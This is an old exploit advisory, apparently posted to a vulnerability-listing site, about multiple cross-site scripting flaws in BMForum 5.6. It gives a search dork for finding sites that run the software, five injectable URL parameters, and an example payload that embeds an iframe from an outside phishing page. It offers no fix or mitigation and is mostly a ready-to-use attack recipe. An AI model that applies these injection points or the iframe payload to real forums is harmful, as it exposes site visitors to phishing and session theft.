Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

www file share pro 5.30 insecure multiple

phpSQLiteCMS Multiple Remote XSS Vulnerability

Exteen Blog XSS Remote Cookie Disclosure Exploit

PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability

From:	tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date:	22.05.2008
Subject:	BMForum Remote 5.6 Miltiple XSS Vulnerability

==========================================================
     BMForum Remote 5.6 Miltiple XSS Vulnerability             
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
APPLICATION : BMForum
VERSION     : 5.6 (Lastest Version)
VENDOR      : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.
php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.
php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.
php?myplugin=<XSS>

--- Note ---
Very Dangerous for using 'IFRAME' TAG for Phishing Techniques

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
                                                                                 
                                     

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################